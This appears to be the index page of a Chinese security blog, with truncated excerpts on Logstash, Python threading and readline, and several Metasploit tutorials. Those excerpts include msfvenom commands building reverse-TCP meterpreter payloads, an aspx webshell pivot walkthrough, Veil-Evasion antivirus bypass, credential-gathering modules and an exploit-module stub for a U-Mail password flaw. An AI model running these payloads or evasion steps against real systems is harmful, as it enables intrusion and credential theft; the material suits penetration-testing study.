2018-12-15 03:04:55

AttackFilter-logstash-filter-attackfilter

AttackFilter logstash-filter-attackfilter-1.0.6 此插件为 ElasticSearch 导入工具 Logstash 扩展安全分析插件  AttackFilter插件安装 下载插件 git clone http://github.com/attackfilter 在 logstash-X.X.X/Gemfile 加入插件路径信息 mv attackfilter logstash-X.X.X/vendor/bundle/jruby/1.9/gems/ vim logstash-X.X.X/Gemfile gem "logstash-filter-attackfilter", :path => "./vendor/bundle/jruby/1.9/gems/logstash-filter-attackfilter-1.0.6"  AttackFilter使用 配置 Logstash 导入配置文件 test.conf input { file { path => "/web-log-2018-01-01.log" start_position => "beginning" } } filter { grok {

2018-12-01 15:57:04

python Tab 终端命令补全空格问题

1. 在很多情况,在编写的终端程序中会有命令交互部分 tools >show plugins<TAB> plugins/portscan plugins/webinfo tools > 希望能出现如上效果 2. python 在这方面给与了一定的处理方式 if 'linux' in sys.platform: import readline elif 'darwin' in sys.platform: sys.path.insert(0, 'module/readline_osx') import readline elif 'win32' == sys.platform or 'win64' == sys.platform: sys.path.insert(0, 'module/readline_windows') import readline 其中 readline 模块可提供TAB补全功能 url:https://docs.python.org/2/library/readline.html#example 3. 在实际使用中官方给与的例子如下 import

2016-07-25 06:22:29

metasploit 模块编写

1. 编写规范 参考如下: https://ruby-china.org/wiki/coding-style 2. 示例参考 以乌云上的漏洞来源为例子:http://www.wooyun.org/bugs/wooyun-2010-061894/(用户在写模块时,可自行从网上搜索漏洞) U-Mail邮件系统权限设置问题导致任意用户密码可越权查看,指定为一个已存在的邮箱账号即可查看任意账户密码。 新建一个新的利用模块umail_pass.rb cd /opt/metasploit/apps/pro/msf3/modules/exploits vi umail_pass.rb 示例代码如下: #encoding:utf-8 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "U-Mail System Unauthorized Access V

2016-07-25 03:59:58

python 多线程 多进程 任务技巧

1、传统例子 在DDG https://duckduckgo.com/ 搜索“Python threading tutorial”关键字,结果基本上却都是相同的类+队列的示例。 标准线程多进程,生产者/消费者示例: #Example.py ''' Standard Producer/Consumer Threading Pattern ''' import time import threading import Queue class Consumer(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self._queue = queue def run(self): while True: # queue.get() blocks the current thread until # an item is retrieved.

2016-07-24 17:14:06

使用veil-evasion+metasploit生成后门

Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。 Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。 在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。 1、安装 veil-evasion,kalilinux可以直接 apt-get install veil-evasion,或者直接到官网下载: https://github.com/Veil-Framework/Veil 2、使用 使用use、list可以列出当前可用的模块 如果要使用某个模块可以直接输入 use + 模块的名称,例如 use python/meterpreter/rev_tcp,或者是直接 use + 模块前面的序号。 使用模块和metasploit的模块 使用方法很相似 options — 列出当前可以设置的选项 set LHOST, set LPORT,设置相关的端口号和ip(ip也可以是域名,方便外网上线) generate—当ip和端口都设置好了之后就可以生成payload。 生成成功后会显示如下内容: 可以到/var/lib/ve

2016-07-24 16:52:48

metasploit 常用模块

爬虫: auxiliary/crawler/msfcrawler 判断存活主机: meterpreter > run arp_scanner -r 寻找局域网里面匿名ftp auxiliary/scanner/ftp/anonymous 寻找putty保存的密码 meterpreter > run enum_putty 寻找ie保存的密码 meterpreter > run post/windows/gather/enum_ie windows的口令: meterpreter > run windows/gather/smart_hashdump 得到本地路由: meterpreter > run get_local_subnets 暴力破解: use auxiliary/scanner/mssql/mssql_login mssql执行cmd: use auxiliary/admin/mssql/mssql_exec 端口扫描 auxiliary/scanner/portscan scanner/portscan/ack ACK防火墙扫描 scanner/portscan/ftpbounce FTP跳端口扫描 scanner/portscan/syn SYN端口扫描 scanner/portscan/tcp TCP端口扫描 scanner/port

2016-07-24 16:21:41

metasploit 使用 aspxshell 进行内网渗透

在http://xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell 首先用Metasploit生成反弹马,也就是生成反弹的payload: 成功生成反弹型payload: (1)生成win下的exe msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe (2)生成win下的aspx msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx (3)我生成一个aspx的反弹马 然后启动msfconsole (4)本地监听,反弹后的控制端: use exploit/multi/handler (5)本地监听的确定用哪个payload: set payload windows/meterpreter/reverse_tcp (6)设置本地监听的端口: set lport 7788 (7)设置本地的监听的地址: set lhost 0.

2016-06-15 04:02:01

PyQt4 QThread QMutex 多线程及锁

from PyQt4.QtGui import * from PyQt4.QtCore import * import sys class Windows(QDialog): def __init__(self, parent=None): super(Windows, self).__init__(parent) self.startButton = QPushButton("Start") self.stopButton = QPushButton("Stop") self.stopButton.setEnabled(False) self.statusLable = QLabel("Please click \"start\"") self.statusLable.setFrameStyle(QFrame.StyledPanel| QFrame.Plain) topLayout = QHBoxLayout() topLayout.addWidget(self.startButton)

2016-05-01 04:39:49

metasploit EXITFUNC

This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. 这exitfunc选项有效地设置一个hash函数 EXITFUNC 有4种不同的值 : none(无), seh(发生错误时), thread(线程) and process(进程). 通常它被设置为线程或进程,其对应于了 ExitThread 或 ExitProcess 函数的调用。 " none" 参数将调用 GetLastError函数,实际上是一个无操作. 然后,该线程将继续执行,可以方便地挂接多个payload一起被串行运行。 EXITFUNC在某些情况下还是很有用的,等你利用完一个启动框架以后,想要干净的退出,但是很不幸的是很多 payload没有退出执行函数 SEH 当存在程序出现异常处理(SEH)发生错误时,自动重新启动该线程或进程应使用此方法。 THREAD 这种方法是用在大多数的情况下,利用开发过程(如IE)运行 shellcode在子线程和线程,可以在工作应用程序/系统(干净的退出)退出这个线程 PROCESS 这个方法应该多/处理器使用..这种方法也可用于任何漏

2016-04-28 16:51:07

metasploit 常用命令

show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出指定渗透攻击或模块的相关信息。 use name 装载一个渗透攻击或模块。 LHOST 你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。 RHOST 远程主机或是目标主机。 set function 设置特定的配置参数(EG:设置本地或远程主机参数)。 setg function 以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。 show options 列出某个渗透攻击或模块中所有的配置参数。 show targets 列出渗透攻击所有支持的目标平台。 set target num 指定你所知道的目标的操作系统以及补丁版本类型。 set payload name 指定想要使用的攻击载荷。 show advanced 列出所有高级配置选项。 set autorunscript migrat